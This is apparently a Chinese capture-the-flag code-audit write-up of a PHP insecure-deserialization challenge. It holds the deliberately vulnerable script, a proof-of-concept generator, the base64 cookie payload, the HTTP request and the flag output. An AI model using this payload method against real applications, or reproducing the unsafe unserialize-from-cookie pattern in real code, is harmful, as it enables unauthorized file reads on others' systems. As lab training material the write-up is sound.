serVuln3 代码审计2

源码

<?php

class Gemini
{
    var $id;
    var $user;

    public function __construct($id, $user)
    {
        $this->id = $id;
        $this->user = $user;
    }

    function __destruct()
    {
        printf("%s\n", __METHOD__);
        $this->login();
    }
    function login()
    {
        printf("%s\n", __METHOD__);
        if ($this->id === "1317" and $this->user === "lutalica") {
            echo file_get_contents('/flag');
        }
    }
}
if (isset($_COOKIE['Gemini'])) {
    unserialize(base64_decode($_COOKIE['Gemini']));
} else {
    echo "系统检测发现该处漏洞，进行攻击测试\n";
}
?>                        

POC

<?php

class Gemini
{
    var $id;
    var $user;

    public function __construct($id, $user)
    {
        $this->id = $id;
        $this->user = $user;
    }
}

echo base64_encode(serialize(new Gemini("1317", "lutalica")));

Tzo2OiJHZW1pbmkiOjI6e3M6MjoiaWQiO3M6NDoiMTMxNyI7czo0OiJ1c2VyIjtzOjg6Imx1dGFsaWNhIjt9

GET / HTTP/1.1
Host: localhost
Cookie: Gemini=Tzo2OiJHZW1pbmkiOjI6e3M6MjoiaWQiO3M6NDoiMTMxNyI7czo0OiJ1c2VyIjtzOjg6Imx1dGFsaWNhIjt9

拦截流量，传入payload ，得到

Gemini::__destruct
Gemini::login
Sonder{135d79-ba631f65200a5f-870225232871-7af1e740}

payload 被反序列化，触发Gemini 类的 destruct 方法，进而执行login 方法，最终得以执行file_get_contents('/flag') 得到文件/flag 的内容